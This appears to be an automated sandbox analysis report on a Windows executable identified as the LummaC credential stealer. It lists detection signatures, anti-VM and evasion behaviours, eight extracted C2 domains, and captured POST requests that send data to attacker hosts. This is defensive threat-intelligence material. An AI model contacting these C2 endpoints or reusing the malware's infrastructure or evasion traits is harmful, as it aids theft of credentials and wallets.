Windows Analysis Report
nvtoaldlrg.exe

Overview

General Information

Sample name: nvtoaldlrg.exe
Analysis ID: 1637345
MD5: 4a0c3d026246920f6b8bd466cc5fdd8c
SHA1: 2536873426bdcd8cdc5fa40b54d68cdf1a0766ff
SHA256: fdba4cab6bb651c5ffecf92d1bfd3de70ef5433a6aea4976db9753742799b7a3
Tags: exe, user-TornadoAV_dev

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • nvtoaldlrg.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\nvtoaldlrg.exe" MD5: 4A0C3D026246920F6B8BD466CC5FDD8C)
  • cleanup
{"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}
Source | Rule | Description | Author | Strings
00000000.00000003.921555375.000000000147F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: nvtoaldlrg.exe PID: 7128 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: nvtoaldlrg.exe PID: 7128 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.nvtoaldlrg.exe.ac0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched

          AV Detection

          Source: nvtoaldlrg.exe, Avira: detected
          Source: https://latchclan.shop:443/Wjquw, Avira URL Cloud: Label: malware
          Source: https://bugildbett.top:443/bAuzaMicrosoft, Avira URL Cloud: Label: malware
          Source: https://featureccus.shop:443/bdMAn, Avira URL Cloud: Label: malware
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"]}
          Source: nvtoaldlrg.exe, Virustotal: Detection: 58%
          Source: nvtoaldlrg.exe, ReversingLabs: Detection: 68%
          Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: citydisco.bet/gdJIS
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: featureccus.shop/bdMAn
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: mrodularmall.top/aNzS
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: jowinjoinery.icu/bdWUa
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: legenassedk.top/bdpWO
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: htardwarehu.icu/Sbdsa
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: cjlaspcorne.icu/DbIps
          Source: 00000000.00000002.1045933046.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, String decryptor: bugildbett.top/bAuz
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, Code function: 0_2_00ADBBD0 CryptUnprotectData,0_2_00ADBBD0
          Source: nvtoaldlrg.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49682 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49684 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49731 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49733 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49738 version: TLS 1.2
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe, Code function: 0_2_00B50490 FindFirstFileW,0_2_00B50490

          Networking

          Source: Malware configuration extractor, URLs: citydisco.bet/gdJIS
          Source: Malware configuration extractor, URLs: featureccus.shop/bdMAn
          Source: Malware configuration extractor, URLs: mrodularmall.top/aNzS
          Source: Malware configuration extractor, URLs: jowinjoinery.icu/bdWUa
          Source: Malware configuration extractor, URLs: legenassedk.top/bdpWO
          Source: Malware configuration extractor, URLs: htardwarehu.icu/Sbdsa
          Source: Malware configuration extractor, URLs: cjlaspcorne.icu/DbIps
          Source: Malware configuration extractor, URLs: bugildbett.top/bAuz
          Source: global traffic, HTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1 | Connection: Keep-Alive | Host: steamcommunity.com
          Source: Joe Sandbox View, IP Address: 104.21.48.1
          Source: Joe Sandbox View, IP Address: 104.21.16.1
          Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.97.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.97.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49731 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 188.114.97.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49733 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49738 -> 188.114.96.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49724 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49694 -> 188.114.96.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 188.114.97.3:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49700 -> 104.21.80.1:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49688 -> 104.21.96.1:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49727 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49697 -> 104.21.48.1:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49703 -> 104.21.16.1:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.73.234.102:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.97.3:443
          Source: global traffic, HTTP traffic detected: POST /gdJIS HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 73 | Host: citydisco.bet
          Source: global traffic, HTTP traffic detected: POST /gdJIS HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=g82Kw7030JG54Ml | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 14496 | Host: citydisco.bet
          Source: global traffic, HTTP traffic detected: POST /gdJIS HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6nR23kDEj | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15012 | Host: citydisco.bet
          Source: global traffic, HTTP traffic detected: POST /bSHsyZD HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 111 | Host: guntac.bet
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic, DNS traffic detected: DNS query: citydisco.bet
          Source: global traffic, DNS traffic detected: DNS query: featureccus.shop
          Source: global traffic, DNS traffic detected: DNS query: mrodularmall.top
          Source: global traffic, DNS traffic detected: DNS query: jowinjoinery.icu
          Source: global traffic, DNS traffic detected: DNS query: legenassedk.top
          Source: global traffic, DNS traffic detected: DNS query: htardwarehu.icu
          Source: global traffic, DNS traffic detected: DNS query: cjlaspcorne.icu
          Source: global traffic, DNS traffic detected: DNS query: bugildbett.top
          Source: global traffic, DNS traffic detected: DNS query: latchclan.shop
          Source: global traffic, DNS traffic detected: DNS query: steamcommunity.com
          Source: global traffic, DNS traffic detected: DNS query: guntac.bet
          Source: unknown, HTTP traffic detected: POST /gdJIS HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 73 | Host: citydisco.bet
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021457765.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.0000000001464000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045283888.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021677883.00000000014DD000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1047004011.0000000001514000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994470945.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.0000000001465000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021655764.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://featureccus.shop:443/bdMAn
          Source: nvtoaldlrg.exe, 00000000.00000003.842683097.00000000044D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/
          Source: nvtoaldlrg.exe, 00000000.00000002.1046939719.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045634437.00000000014DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/bSHsyZD
          Source: nvtoaldlrg.exe, 00000000.00000003.1045651117.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1048195980.00000000044AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet/bSHsyZDC
          Source: nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://guntac.bet:443/bSHsyZDal
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021330276.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994497525.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021249282.000000000450A000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021298673.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994365862.00000000044AA000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994449245.0000000001519000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu:443/bdWUaicrosoft
          Source: nvtoaldlrg.exe, 00000000.00000003.994650409.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000146B000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000146B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://latchclan.shop:443/Wjquw
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000147F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
